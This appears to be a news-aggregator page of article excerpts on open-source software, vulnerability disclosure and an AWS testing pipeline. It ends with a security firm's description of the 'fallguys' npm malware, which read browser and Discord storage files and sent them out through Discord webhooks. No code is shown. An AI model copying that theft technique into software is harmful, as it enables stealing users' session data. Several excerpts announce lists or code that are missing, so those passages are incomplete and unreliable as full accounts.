BEIJING, Sept. 4, 2020 /PRNewswire/ --Following recent allegations raised about the ad data collected by the Mintegral SDK, Mintegral has announced its SDK will officially become open-source. While Mintegral denies recent allegations, the move to open-source the SDK is seen as a way to increase transparency within the ad-tech industry and provide complete visibility into its inner workings.

The move to open-source SDK

Mintegral's move to open-source SDK allows mobile developers access to learn exactly how it works, without any concerns around unwanted code and/or functionality. Since everyone will be able to access it (and improve upon it), this will make the Mintegral open-source SDK more secure. In turn, it will be easier and faster to identify & address any risk as the SDK will undergo constant review by the mobile community.

Open-source SDK is the future

Moving to open-source SDKs benefits the whole mobile ad industry, by providing its customers and end-users with increased transparency and security, while further emphasizing features like speed, quality, and customizability. With this move, Mintegral is also encouraging other members of the mobile industry to do the same in order for the entire advertising ecosystem to thrive.

"We are about to move our industry-leading SDK to an open-source environment, and I am excited about the possibilities that come with it, not just for our team, but for all our partners, and ultimately everyone in the mobile ad industry. I believe transparency is a crucial tool towards a stronger and safer industry, and we will work hard to make sure that our partners and our clients will constantly benefit from the highest transparency and security standards available," said Erick Fang, Mintegral CEO.

As the industry demands more transparency from its players, Mintegral believes it's important to provide full clarity around the SDK and its capabilities. As a COPPA-certified member, and fighting ad fraud with the adoption of App-Ads.txt; to getting open measurement SDK certification from IAB Tech Lab and adding support for Sellers.json and Supply Chain Object, Mintegral has always been a major advocate for data privacy, security, and transparency.

What's next?

Mintegral plans on rolling out the open-source SDK within the next week and will notify their partners and clients as soon as such changes have been made. Mintegral will also release a breakdown of how the SDK operates in a future article. For more news regarding this matter, clients are welcome to reach out to the Mintegral team or follow news through the Mintegral blog.

Contact: [emailprotected]

SOURCE Mintegral

https://www.mintegral.com/en/

Excerpt from:

Mintegral SDK Going Open-Source For Increased Transparency And Security - PRNewswire

Eight safeguards are essential for a full, robust software protection regime. [But most lawyers] only learned about four of them in law school. In todays world, lawyers need to go beyond law school and include real-world, practical solutions to augment the legal protections that are their bread and butter.

Software is an extremely valuable good for those who produce it because it provides value to the softwares end users. That value, however, also makes it a target for those who would prefer to obtain the value without compensating the software producer. As a result, like with any valuable asset, software suppliers and Internet of Things (IoT) companies must implement safeguards to protect it. Since software is intellectual property, attorneys who work for or advise software producers (which, lets be honest, is just about every technology company these days, given the addition of hardware manufacturers via the ubiquity of their smart devices to the existing desktop, mobile, and SaaS applications that we all use in both our personal and business lives), are frequently asked to advise on how to best protect this valuable asset. Unfortunately, as discussed below, most lawyers only deliver half of what they should.

Eight safeguards are essential for a full, robust software protection regime. Despite that, most lawyers talk about only four of them. In their defense, they only learned about four of them in law school, which is why thats their go-to advice. But in todays world, lawyers need to go beyond law school and include real-world, practical solutions to augment the legal protections that are their bread and butter. This article will review all eight, but the bulk of the discussion will illustrate the importance and usefulness of the four less-frequently discussed methods.

The first four methodswhich lawyers already know about and take action onfocus on protecting software from a purely legal perspective:

While each legal protection discussed above is great and must be considered, the truth is that the best outcome for the software producer is when they never have to rely on the legal protections at all. Enforcing legal rights is expensive, time consuming and distracting to a software producer that would much rather focus on developing the next product instead of defending the last one. How do you do that? How do you avoid having to actually rely on the legal protections we just laid out? By using technology to prevent the software from being misused or overusedintentionally and unintentionallyin the first place. Below are some practical solutions your clients can deploy:

The final software protection strategy is less about protection of the software producers rights; its more related to solidifying the foundation of the software producers products. Most commercial code today relies to some degree (and often to a great degree) on the use of open source software components. Open source software, as referenced above, is code developed by third parties and then incorporated into a software producers final product. While theres usually no fee charged by the open source provider, the open source code is subject to contractual requirements. Given that this whole article is about how to protect your clients software from misuse, it would be ironic if your client then failed to take the necessary steps to ensure it didnt misuse open source software! Unfortunately, open source software is unmanaged by most companies. On average, most software producers are aware of and manage a mere 5% of the open source software used in their products. Failure to fully document and understand open source usage and to comply with relevant obligations can undo all of the careful work taken through the first seven safeguards above.With this in mind, the final safeguard is:

In 1941, baseballs Ted Williams of the Boston Red Sox finished the season with a .406 batting average, meaning he successfully reached base in .406 of his at bats. In the 79 years since, no one has equaled that feat, heralded as one of baseballs unbreakable records. While thats impressive, it means Mr. Williams failed almost 60% of the time! In the world of software protection, the good news is that most lawyers are out-hitting Ted Williams, usually deploying 50% of the protection schemes available to them. The bad news: 50% isnt cause for celebration. Using the additional four practical protections discussed above is what will provide a comprehensive approach to protecting software. Eight out of eightthats something to celebrate.

Image Rights acquired by 123RF.com

Marty Mellican is Vice President and Associate General Counsel at Revenera (formerly known as Flexeras Supplier Division).

Visit link:

Four Out of Eight Doesn't Cut It: The IP Safeguards that Most Lawyers Miss When Protecting Software - IPWatchdog.com

When the initial wave of news regarding the coronavirus crisis and response from the Czech government first came out back in March, Expats.cz experienced a surge in traffic that saw our numbers balloon to record highs at peak times. Our news server couldnt handle the volume, and immediately crashed as the traffic spiked.

Thankfully, we had the right support on hand: David Strejc of WPDistro, a Prague-based developer who specializes in WordPress and open source solutions. Since migrating to WPDistros servers six months ago, our news site hasnt seen any downtime at all.

David is also a long-term advocate of Open Source software solutions, and provides the CRM system AutoCRM, which builds upon a solution used by more than 50,000 companies worldwide.

We recently spoke with David about the Information Technology sector in the Czech Republic, how it compares to the rest of the world, and whats in store for the future.

Hi David! Whats your IT background and expertise?

Im a long-term IT guy, currently 16 years in the IT business. Ive worked for two telco providers, O2 and T-Mobile, as IT Architect and Senior Solution designer, respectively, established the company Easy Software with my partners, and sold my share in it. They are currently providing SaaS around the globe for more than 3000 companies. I was an IT Architect, CTO there.

What about IT here in the Czech Republic?

On one side we are the fifth biggest software producer in terms of absolute numbers here in the Czech Republic. Companies like Red Hat and others rely on Czech programmers. We are second in some programming skill tests sometimes behind Slovaks. We have great people in IT, highly-skilled, hard-working.

On the other hand, we are four years behind actual trends in US.

How can this be?

There is huge difference between the IT sector, and companies which are IT product consumers. Take an average factory or a classic office, for example. They still mentally live in 90s. And many producers of software here in the Czech Republic make software designed for this kind of mentality. Updates come twice a year, no one answers your email for more than a week, and no one picks up your urgent call for support.

What do you think of world trends in IT compared to the Czech Republic?

Take companies like Facebook, Google, and now even Microsoft. We live in crazy times where the current trend is to deploy software changes, security patches, new features and so on in matter of days. Sometimes daily. Even more. This is called CI/CD. Continuous integration, continuous deployment.

Is this what makes IT/ICT so expensive to have skilled people pushing code so quickly to production?

Actually, it is not. It is the opposite. The extreme overpricing of IT here in the Czech Republic, and other countries too, is due to the duplication of work.

Take for example CRM or ERP systems. There are dozens of them. Even here in the Czech Republic we have nearly 50 well-established companies producing the same solutions. And all of them are producing the same thing, reinvented 50 times. Multiply those 50 software solutions by 1020 programmers each, and you get extreme monthly costs.

Isnt that OK? Isnt software about freedom of choice?

Exactly. But when you buy one of those solutions you are done. Your freedom of choice ends when you implement one of these classically-produced software solutions. We have a great example here in the Czech Republic where our Ministry of Finance has a nearly 30-year-old software yes, you read that correctly financing bureaus thanks to old contracts with IBM who didnt bother to give us permission to use their software without them again, you read it correctly. It is still their software due to their policy we cant simply switch to another supplier.

And it is the same with nearly all of those classic Czech software producers. Duplicating work, catching their customers into a vendor-locking net like fish, and than like parasites draining money from them for every patch, every software update, every overpriced feature. Once you are caught you can say goodbye to your IT freedom. Those companies need the money to feed their highly overpriced programmers who are duplicating the same functions as their competitors.

And this leads to high prices for the end consumer.

Its a classic case of reinventing the wheel. But many, many, many times over. And you need many, many, many inventors.

And the HR market is happy. Programmers and IT guys cost a lot of money, HR takes them as resource/product and delivers them into company where they last for two years, and then they move to another one. Job companies are happy, programmers are happy they ask for more and more. The only unhappy one is the final customer who comes from outside of the IT sector.

Not only is the final product highly overpriced, but the customer is also locked into the vendor, and this staffing fluctuation in the IT industry causes even more trouble. Because Franta, lead programmer at ABC Softcorp s.r.o., is suddenly gone. And no one knows what exactly this function is for, or how we will solve that, and now we have to rename half of our code because it is written in Czech yes, this is still the case, they are naming variables in the Czech language.

Is there an alternative? How is IT made in other countries, like the US?

These days, my long-term predictions are coming true. For 16 years I have been an Open Source advocate. Not because of the price. Not because of the security (it can be proven that OSS is more secure than classic software take OpenBSD for example), not because I can dig into code, but because of the resources. Because when we compete too much, we destroy, we die.

Companies like Facebook, Google, LinkedIN and many many others based in US now even Microsoft, who loves Linux and Open Source they have discovered that IT is such a different area, that we can produce software that even competitors collaborate on.

Give us an example.

Engineers at Red Hat are producing an Open Shift platform for development, for example. And their customers have dedicated teams of their own engineers sitting in offices or home offices patching, debugging, and improving this huge platform. So customers are helping with their time, money, project management and all that stuff to have better software from their supplier.

And this is across the entire modern IT world. My old way of doing things in Unix way is now becomes a reality. IT companies who compete and try to destroy their competitors like here in the Czech Republic will die out. Companies that support each other will produce more complex, more stable solutions for less money which is Open Source software in many cases. MariaDB, which is OSS, says they can replace Oracle, which costs $50,000 for one core per year.

Are there any other advantages of OSS?

You can say, I dont like you anymore, producer of ABC OSS software. I will take Youngsters Ltd. they know what they are doing, they are young and full of energy. They pick up my phone after one ring, they answers my emails immediately. And the OSS producer cant say: you cant do that, it is our licensed software which we are only leasing you. Everything is ours. No Youngsters Ltd. will take over support and development of the new features. But a whole community of developers is contributing to bug fixes, feature requests, and deciding the best plan for this ABC OSS software.

You dont have to use Microsoft SQL or Oracle which only adds expenses for no value. MariaDB clusters are now used even in mission-critical areas of the banking industry. Facebook runs the biggest cluster of MySQL databases in the world. Imagine what Facebooks bills for Oracle would be if they were using it.

Youve mentioned Facebook do you like what theyre doing?

I am not big fan of social networks, but I am big fan of the philosophy. Unix is more of a philosophy than only a software. It is way of doing things. And I love it. Facebook has inspired me in many ways. They produced the first versions of Facebook using PHP programming language (which many so-called skilled programmers hate) and have used MySQL databases from beginning. Craziness? I dont think so. PHP programmers were many times cheaper, had more availability, and were easier to hire.

Cheaper and more effective. Open Source from beginning. Even now Facebook produces Open Source software and gives it to public, such as React and many others that are not as well known.They alsocreated the Open Compute Project. They give out designs and plans for hardware, servers, racks and so on.

And this is the philosophy of Open Source, Unix, and original hacker culture. Do it for fun. Do it for the lowest available cost, because we live in agile world and we want to see proof of concept in the shortest available time. We dont want to wait year or two the whole industry can shift somewhere else. We want a software solution now so we can put our hands on it and tweak it to fit our needs.

This sounds like an entirely different approach to producing software.

Its actually very old concept. But when Microsoft, Oracle and others took over the industry in 80s and 90s with their waterfall methods and postponing of releases, planing years ahead they changed peoples perspectives. Now, pure technology is winning over overpriced business. In 2019, CNBC produced a video about Open Source software taking over whole industry.

Are you afraid of Open Source? Do you consider it unsecure? You are using it daily. Its in your pocket in the form of Android or iOS. When you are browsing web using Chrome or Firefox as a user and on the other side there is Apache or Nginx, which are both Open Source. More than 60% of virtual machines on Azure are Linux, Facebook runs on MySQL clusters, Google has put their container platform Omega into public form in Kubernetes, every last one of the top 500 supercomputers in the world runs Linux. The current zeitgeist is Open Source.

And do you produce Open Source in your current company?

We focus on the harder part of Open Source. We provide support, writing the little pieces of code which are not yet available because we are mainly working with WordPress, which is a great example of Open Source taking over the world. WordPress is powering 38% of the top 10,000 websites in the world. It actually powers more than 35% of entire web industry in the world. And its still growing.

This is great example of many developers collaborating on one platform. Microsoft uses WordPress on their news.microsoft.com, Facebook uses it on about.fb.com, the White House is using it, The New York Times, Tech Crunch, and many other big brands.

The advantages are obvious. You can instantly hire a developer who is familiar with the code, with the principles, with the documentation and culture. Web administrators in companies are familiar with the interface they are working in. If your supplier, which can be even us, doesnt suit your communication style, you can search Google for new one and find them in two minutes.

Is WordPress the only solution you specialize in?

We focus on bigger e-commerce sites and lets say high-end WordPress websites for now. But we find our company brain elsewhere. We have a great Open Source CRM software that is enormously powerful in matters of flexibility, speed, software philosophy (it is headless, so it can easily be connected with any other application through REST API). Right now we are building a website to offer this solution to other companies here in the Czech Republic and around Europe.

For more information about WPDistro, and how they can help your online business, visit their official website.

More:

Q&A: Open Source advocate David Strejc on why the Czech IT industry is so overpriced - Expats.cz

Threema, an encrypted messaging service that offers a substantial number of features, has announced a big business change that may increase some otherwise skeptical users trust in the platform. In its announcement, the Threema team said its messaging apps will soon be made fully open source, making it easier to independently review the apps security and verify their code.

While theres no lack of secure messaging apps on the market, some of them are more private than others. There are messaging services where the messages reside on the companys servers, then there are encrypted messaging services where the company isnt able to access the users data. Threema falls into the latter category.

Unlike apps like Telegram, which is more targeted at the average consumer, Threema is a higher-end product that includes a variety of features, including support for voice and text messages, groups, distribution lists, and sending files like MP3s and PDFs. As well, users can share locations and images/videos.

When compared alongside the more popular encrypted messaging app Signal, there was both an upside and a downside. The upside? Threema assigns the user a unique ID, eliminating the need to use a phone number. The downside? Threema wasnt open-source, unlike Signal, something that was a concern for some potential users.

In its update on Thursday, Threema announced that it has partnered with Afinum Management AG and that it is making its apps open source. This open-source change only applies to the apps, not the backend, but Threema notes that it has and will continue to conduct regular external reviews. Likewise, Threema says its users will soon be able to use multiple devices in parallel without compromising their data.

More:

Threema encrypted messaging apps will soon be open source - SlashGear

If you own a laptop thats got a few years on the clock, youve probably contemplated getting a replacement battery for it. Which means you also know how much legitimate OEM packs cost compared to the shady eBay clones. You can often get two or three of the knock-offs for the same price as a single real battery, but they never last as long as the originals. If they even work properly at all.

Which is why [Alexander Parent] decided to take the road less traveled and scratch built a custom battery for his ThinkPad T420. By reverse engineering how the battery pack communicated with the computer, he reasoned he would be able to come up with an open source firmware that worked at least as well as what the the third party ones are running. Which from the sounds of it, wasnt a very high bar. From a more practical standpoint, it also meant hed be able to create a higher capacity battery pack than what was commercially available should he chose to.

A logic analyzer wired in between one of the third party batteries and a spare T420 motherboard allowed [Alexander] to capture all the SMBus chatter between the two. From there he wrote some Arduino code that would mimic a battery as a proof of concept. He was slowed down a bit by an undocumented CRC check, but in the end he was able to come up with a fairly mature firmware that even allows you to provide a custom vendor name and model number for your pack.

The code was shifted over to an ATtiny85, with a voltage divider wired up to one of the pins so it can read the pack voltage. [Alexander] says his firmware still doesnt do a great job of reporting the actual battery capacity remaining, but its close enough for his purposes. He came up with a simple PCB design to hold the MCU and support components, which eventually he plans on putting inside of a 3D printed case that actually plugs into the back of his T420.

This project is obviously still in a relatively early stage, but were very interested to see [Alexander] take it all the way. The ThinkPad has long been the hackers favorite laptop, and we can think of no machine more worthy of a fully open hardware and software battery pack.

Read this article:

12 thoughts on Building An Open Source ThinkPad Battery - Hackaday

Facebook has announced a policy change that will see the company notify third-party developers if it finds a security vulnerability in their code.

In a blog post announcing the change,Facebook said it may occasionally find critical bugs and vulnerabilities in third-party code and systems. When that happens, our priority is to see these issues promptly fixed, while making sure that people impacted are informed so that they can protect themselves by deploying a patch or updating their systems.

Facebook has previously notified third-party developers of vulnerabilities, but the policy shift formally codifies the companys policy toward disclosing and revealing security vulnerabilities.

Vulnerability disclosure programs, or VDPs, allow companies to set the rules of engagement for finding and disclosing security bugs. VDPs also help guide the disclosure and publication of vulnerabilities once a bug is fixed. Companies often use a bug bounty to pay hackers who follow the companys reporting and disclosure rules.

The policy change is not entirely altruistic. Facebook, like many other tech companies, relies on a ton of third-party code and open-source libraries. But by putting the change in writing, it also puts third-party developers on notice if they dont fix vulnerabilities in a timely fashion.

Casey Ellis, founder and chief technology officer at vulnerability disclosure platform Bugcrowd, said the policy shift was becoming increasingly popular for companies with a large, user-centric, third-party attack surface, and echoes similar efforts by Atlassian, Google and Microsoft.

Facebook said when it finds a vulnerability, it will give third-party developers 21 days to respond and 90 days to fix the issues, a widely accepted time frame to report and remediate security issues. The company says it will make a reasonable effort to find the right contact for reporting a vulnerability, including, but not limited to, emailing security reporting emails, filing bugs without confidential details in bug trackers or filing support tickets. But the company said it reserves the right to disclose sooner if the vulnerability is actively being exploited by hackers, or delay its disclosure if its agreed that more time is needed to fix an issue.

Facebook said it will generally not sign a non-disclosure agreement (NDA) specific to the security issues it reports.

Katie Moussouris, founder of Luta Security, told TechCrunch that the devil will be in the details.

The test will be the first time they have to pull the trigger and drop a zero-day with mitigation guidance on a competitor, she said, referring to unpatched vulnerabilities where companies have zero days to patch them.

The new policy is focused specifically on how Facebook handles disclosure of issues in third-party code. If researchers find a security vulnerability on Facebook, or within its family of apps, they will continue to report it through the existing Bug Bounty Program.

As part of the policy change, Facebook said it would also disclose vulnerabilities once they are fixed. In a separate blog post, Facebook, which owns WhatsApp, disclosed six vulnerabilities in the messaging app since fixed.

Read the original:

Facebook to warn third-party developers of vulnerable code - TechCrunch

AS a developing country, the Philippines is always challenged to provide concerned stakeholders all their information and communications technology (ICT) needs to boost the digital capability of the country.

Radenta Technologies Inc., a Filipino-owned computing technology company, recently pointed out that using the Linux operating system is one major way to meet the challenges of the dearth in computing software. One difference, however, is that Linux is an open source software that is free and available for the public to view, edit and, for those with the technical skill, contribute to. Linux is customizable. You can swap out word processor, web browsers, system display graphics and other user-interface components, the company said in a press statement.

Since it is an open source OS, Linuxs source code can be accessed by everyone. Anyone who has coding skills can contribute, modify, enhance and distribute the code to anyone and for any purpose.

With skills in Linux, Radenta pointed out that IT professionals have a lot of opportunities in fields,

such as Cloud Computing, Cybersecurity, Networking and IT Infrastructure, Open Source Technologies, Android and Embedded Technologies, and High Performance Computing.

Moreover, Radenta said Linux is also being used in many devices, its code underpinning such popular platforms as Android phones, tablets and Chromebooks, digital storage devices, personal video recorders, cameras, wearables and smart appliances.

Moreover, Microsofts Windows OS even carries Linux components as part of the Windows Subsystem for Linux (WSL).

Radenta said companies and individuals select Linux for their servers for its security, flexibility and robustness, complemented by excellent support from a community of users worldwide and such global companies as Canonical, the company behind Ubuntu; SUSE and Red Hat, all of which offer commercial support.

Just like other operating systems such as Windows and Mac OS, Linux has a graphical interface, along with a plethora of applications including word processor, photo editor, video editor and the like. It is as easy to use as competing OSes.

Radenta said testers can ensure everything works on different configurations of hardware and software, and report when things do not. It added that companies can create their own user interfaces. Meanwhile, writers can create documentation, guides and other copy to go with the software. Translators can make sure that people in different parts of the world can understand the programs and documentation.

Developed by Finnish software engineer Linus Torvalds in 1991, Linux enjoys widespread popularity and support across major sectors. One of the major users of Linux in the Philippines is the University of the Philippines-Diliman where it uses Linux as the operating system in their computers.

Radenta said it is offering a training Linux bundle for four persons as part of their campaign to promote Linux. Training starts in October.

See the rest here:

The advantages of using Linux - Business Mirror

Researchers at Academic Medical Centers (AMCs) use programs such as Observational Health Data Sciences and Informatics (OHDSI) and Research Electronic Data Capture (REDCap) to interact with healthcare data. Our internal team at AWS has provided solutions such as OHDSI-on-AWS and REDCap environments on AWS to help clinicians analyze healthcare data in the AWS Cloud. Occasionally, these solutions break due to a change in some portion of the solution (e.g. updated services). The Automated Solutions Testing Pipeline enables our team to take a proactive approach to discovering these breaks and their cause in order to expedite the repair process.

OHDSI-on-AWS provides these AMCs with the ability to store and analyze observational health data in the AWS cloud. REDCap is a web application for managing surveys and databases with HIPAA-compliant environments. Using our solutions, these programs can be spun up easily on the AWS infrastructure using AWS CloudFormation templates.

Updates to AWS services and other program libraries can cause the CloudFormation template to fail during deployment. Other times, the outputs may not be operating correctly, or the template may not work on every AWS region. This can create a negative customer experience. Some customers may discover this kind of break and decide to not move forward with using the solution. Other customers may not even realize the solution is broken, so they might be unknowingly working with an uncooperative environment. Furthermore, we cannot always provide fast support to the customers who contact us about broken solutions. To meet our teams needs and the needs of our customers, we decided to focus our efforts on taking a CI/CD approach to maintain these solutions. We developed the Automated Testing Pipeline which regularly tests solution deployment and changes to source files.

This post shows the features of the Automated Testing Pipeline and provides resources to help you get started using it with your AWS account.

The Automated Testing Pipeline solution as a whole is designed to automatically deploy CloudFormation templates, run tests against the deployed environments, send notifications if an issue is discovered, and allow for insightful testing data to be easily explored.

CloudFormation templates to be tested are stored in an Amazon S3 bucket. Custom test scripts and TaskCat deployment configuration are stored in an AWS CodeCommit repository.

The pipeline is triggered in one of three ways: an update to the CloudFormation Template in S3, an Amazon CloudWatch events rule, and an update to the testing source code repository. Once the pipeline has been triggered, AWS CodeBuild pulls the source code to deploy the CloudFormation template, test the deployed environment, and store the results in an S3 bucket. If any failures are discovered, subscribers to the failure topic are notified. The following diagram shows its overall architecture.

In order to create the Automated Testing Pipeline, two interns collaborated over the course of 5 weeks to produce the architecture and custom test scripts. We divided the work of constructing a serverless architecture and writing out test scripts for the output urls for OHDSI-on-AWS and REDCap environments on AWS.

The following tasks were completed to build out the Automated Testing Pipeline solution:

The architecture can be extended to test any CloudFormation stack. For this particular use case, we wrote the test scripts specifically to test the urls output by the CloudFormation solutions. The Automated Testing Pipeline has the following features:

The pipeline is triggered automatically when an event occurs. These events include a change to the CloudFormation solution template, a change to the code in the testing repository, and an alarm set off by a regular schedule. Additional events can be added in the CloudWatch console.

When the pipeline is triggered, the testing environment is set up by CodeBuild. CodeBuild uses a build specification file kept within our source repository to set up the environment and run the test scripts. We created a CodeCommit repository to host the test scripts alongside the build specification. The build specification includes commands run TaskCat an open-source tool for testing the deployment of CloudFormation templates. TaskCat provides the ability to test the deployment of the CloudFormation solution, but we needed custom test scripts to ensure that we can interact with the deployed environment as expected. If the template is successfully deployed, CodeBuild handles running the test scripts against the CloudFormation solution environment. In our case, the environment is accessed via urls output by the CloudFormation solution.

We used a Selenium WebDriver for interacting with the web pages given by the output urls. This allowed us to programmatically navigate a headless web browser in the serverless environment and gave us the ability to use text output by JavaScript functions to understand the state of the test. You can see this interaction occurring in the code snippet below.

We store the test results in JSON format for ease of parsing. TaskCat generates a dashboard which we customize to display these test results. We are able to insert our JSON results into the dashboard in order to make it easy to find errors and access log files. This dashboard is a static html file that can be hosted on an S3 bucket. In addition, messages are published to topics in SNS whenever an error occurs which provide a link to this dashboard.

In true CI/CD fashion, this end-to-end design automatically performs tasks that would otherwise be performed manually. We have shown how deploying solutions, testing solutions, notifying maintainers, and providing a results dashboard are all actions handled entirely by the Automated Testing Pipeline.

Prerequisite tasks to complete before deploying the pipeline:

Once the prerequisite tasks are completed, the pipeline is ready to be deployed. Detailed information about deployment, altering the source code to fit your use case, and troubleshooting issues can be found at the GitHub page for the Automated Testing Pipeline.

For those looking to jump right into deployment, click the Launch Stack button below.

Tasks to complete after deployment:

After the code is pushed to the CodeCommit repository and the CloudFormation template has been uploaded to S3, the pipeline will run automatically. You can visit the CodePipeline console to confirm that the pipeline is running with an in progress status.

You may desire to alter various aspects of the Automated Testing Pipeline to better fit your use case. Listed below are some actions you can take to modify the solution to fit your needs:

The Automated Testing Pipeline directly addresses the challenges we faced with maintaining our OHDSI and REDCap solutions. Additionally, the pipeline can be used whenever there is a need to test CloudFormation templates that are being used on a regular basis or are distributed to other users. Listed below is the set of specific challenges we faced maintaining CloudFormation solutions and how the pipeline addresses them.

The desire to better serve our customers guided our decision to create the Automated Testing Pipeline. For example, we know that source code used to build the OHDSI-on-AWS environment changes on occasion. Some of these changes have caused the environment to stop functioning correctly. This left us with cases where our customers had to either open an issue on GitHub or reach out to AWS directly for support. Our customers depend on OHDSI-on-AWS functioning properly, so fixing issues is of high priority to our team. The ability to run tests regularly allows us to take action without depending on notice from our customers. Now, we can be the first ones to know if something goes wrong and get to fixing it sooner.

This automation will help us better monitor the CloudFormation-based projects our customers depend on to ensure theyre always in working order. James Wiggins, EDU HCLS SA Manager

If you decide to quit using the Automated Testing Pipeline, follow the steps below to get rid of the resources associated with it in your AWS account.

Deleting the pipeline CloudFormation stack handles removing the resources associated with its architecture. Depending on the CloudFormation template chosen for testing, additional resources associated with it may need to be removed. Visit our GitHub page for more information on removing resources.

The ability to continuously test preexisting solutions on AWS has great benefits for our team and our customers. The automated nature of this testing frees up time for us and our customers, and the dashboard makes issues more visible and easier to resolve. We believe that sharing this story can benefit anyone facing challenges maintaining CloudFormation solutions in AWS. Check out the Getting Started with the Automated Testing Pipeline section of this post to deploy the solution.

More information about the key services and open-source software used in our pipeline can be found at the following documentation pages:

Raleigh Hansen is a former Solutions Architect Intern on the Academic Medical Centers team at AWS. She is passionate about solving problems and improving upon existing systems. She also adores spending time with her two cats.

Dan Le is a former Solutions Architect Intern on the Academic Medical Centers team at AWS. He is passionate about technology and enjoys doing art and music.

Read this article:

Automated CloudFormation Testing Pipeline with TaskCat and CodePipeline - idk.dev

Threema is an encrypted messaging service that has competed as a Signal alternative so far. In terms of features, privacy, and security, Threema is at par with Signal messenger. However, it wasnt open source until now.

Now, the company has announced that Threema apps will become fully open source, supporting reproducible builds, in the coming months.

As of January 2020, Threema acquired more than 8 million users, including over 2 million users of the business solution Threema Work (which includes nearly 5,000 organizations). This change will definitely help in gaining the trust of several skeptical users.

By going open-source, it will be easier for anyone to review the apps security and verify its code independently.

These days we have multiple secure and private messaging apps that can be used for encrypted communication. But some messaging services store messages on the companys servers, whereas in some encrypted messaging services, the company cannot access the users data. Threema belongs to the latter category.

The best part about Threema is that it can assign the user a unique ID, so it doesnt need a phone number to work, unlike WhatsApp or Hike.

But it is not to be confused with apps like Telegram, which majorly targets the average consumer. Threema is more of a premium product that offers a variety of features like voice/text messages, groups, distribution lists, file sharing, and location sharing.

Read the original here:

Signal Alternative 'Threema' Goes Open Source, Works Without Phone Number - Fossbytes

This weekend a report emerged of mysterious npm malware stealing sensitive information from Discord apps and web browsers installed on a users machine.

The malicious component called fallguys lived on npm downloads impersonating an API for the widely popular video game, Fall Guys: Ultimate Knockout. Its actual purpose, however, was rather sinister.

As first reported by ZDNet and analyzed by the npm security team, the component when included in your development builds would run alongside your program, and access the following files:

The file list comprises the local storage leveldb files of different web browsers, such as Chrome, Opera, Yandex, and Brave, along with any locally installed Discord apps.

LevelDB is a key-value storage format mainly used by web browsers to store data especially that relates to a users web browsing sessions.

The fallguys component would pry on these files and upload them to a third-party Discord server, e.g. via webhooks.

Npm removed the malicious package, but fortunately we retain a copy of all components in a secure archive, so the Sonatype Security Research team was able to quickly analyze the malware. In fact, we got this into our data well before the news broke so Nexus users are safe!

In this Nexus Intelligence Insights post, we share a first look inside fallguys.

Vulnerability identifier: sonatype-2020-0774Vulnerability type: Embedded Malicious CodeImpacted package: fallguys as formerly present in npm downloads

CVSS 3.1 Severity Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVSS3.1 Score: 10 (Critical)

While fallguys package was likely created with malicious intent from the beginning, the package exhibits outright suspicious behavior in version 1.0.6.

There are three files found in version 1.0.6. One is a README which touts the malware being a Fall (Read more...)

Link:

Inside the fallguys malware that steals your browsing data and gaming IMs; Continued attack on open source software - Security Boulevard